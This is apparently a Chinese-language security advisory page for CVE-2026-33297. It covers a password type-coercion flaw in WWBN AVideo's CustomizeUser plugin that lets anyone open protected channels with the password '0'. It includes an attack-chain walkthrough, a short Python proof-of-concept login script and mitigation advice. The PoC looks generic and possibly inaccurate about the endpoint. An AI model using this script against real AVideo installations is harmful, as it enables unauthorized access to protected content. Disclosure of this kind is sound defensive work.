CVE-2026-33297 CVSS 9.1 严重

CVE-2026-33297 AVideo密码逻辑错误致访问绕过

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33297

漏洞类型

认证绕过

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台，在26.0版本之前的CustomizeUser插件中存在严重逻辑漏洞。`setPassword.json.php`端点在处理管理员设置的密码时，会将任何包含非数字字符的密码值强制转换为整数0。这导致受保护频道的实际密码变为0，攻击者无需任何凭据即可轻易猜出密码并绕过访问控制限制，获取未授权访问权限。

技术细节

该漏洞的根源在于WWBN AVideo的CustomizeUser插件中`setPassword.json.php`文件对用户输入处理存在严重的类型混淆逻辑错误。当管理员尝试为频道设置访问密码时，后端代码未能正确验证或保留原始字符串密码。由于特定的逻辑缺陷或PHP弱类型处理机制，当密码字段中包含任何非数字字符（如字母或特殊符号）时，系统会自动将其值转换为整数0。这意味着，无论管理员设置多么复杂的密码（例如"Admin@2026"），存储在系统中的有效凭证实际上都是0。在随后的访问控制检查中，攻击者只需提交"0"作为密码，系统通过比较逻辑（0 == 0）即会验证通过。由于该漏洞无需用户交互且利用门槛极低，它允许任何未经身份验证的远程攻击者完全接管受保护频道的访问权限。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用的是WWBN AVideo平台，且版本低于26.0。

STEP 2

漏洞触发

管理员（或攻击者利用其他方式）通过CustomizeUser插件设置了频道密码，由于逻辑错误，系统后台将该密码强制存储为0。

STEP 3

利用漏洞

攻击者在访问受保护频道时，输入密码"0"。系统后端将输入值与存储值（0）进行比对。

STEP 4

达成效果

比对成功（0==0），系统验证通过，攻击者成功绕过认证并获得该频道的访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC script for CVE-2026-33297
# This script demonstrates the authentication bypass vulnerability
# by attempting to access a protected channel using password '0'.

import requests

def exploit_avideo_bypass(target_url, channel_id):
    # The vulnerable endpoint handles password logic
    # In a real scenario, the password has been set by an admin to something complex,
    # but the backend stored it as 0.
    
    login_url = f"{target_url}/object/login.json.php"
    
    # Payload attempting to login with the coerced password '0'
    payload = {
        "user": "admin",  # or target username
        "pass": "0",       # The magic password due to integer coercion
        "channel": channel_id
    }
    
    try:
        print(f"[*] Attempting bypass on {target_url} for channel {channel_id}...")
        response = requests.post(login_url, data=payload, timeout=10)
        
        if response.status_code == 200:
            # Check for success indicators in response (e.g., token, success message)
            if "success" in response.text or response.json().get("status") == "success":
                print("[+] Exploit successful! Access granted with password '0'.")
                return True
        
        print("[-] Exploit failed or target not vulnerable.")
        return False
        
    except Exception as e:
        print(f"[!] Error during exploit: {e}")
        return False

# Example usage
# target = "http://localhost/avideo"
# exploit_avideo_bypass(target, "1")

影响范围

WWBN AVideo < 26.0

防御指南

临时缓解措施

建议立即将WWBN AVideo平台升级到包含补丁的26.0版本。如果无法立即升级，应考虑临时禁用CustomizeUser插件以阻断漏洞利用路径，并通过Web应用防火墙（WAF）实施额外的访问控制策略，直到完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表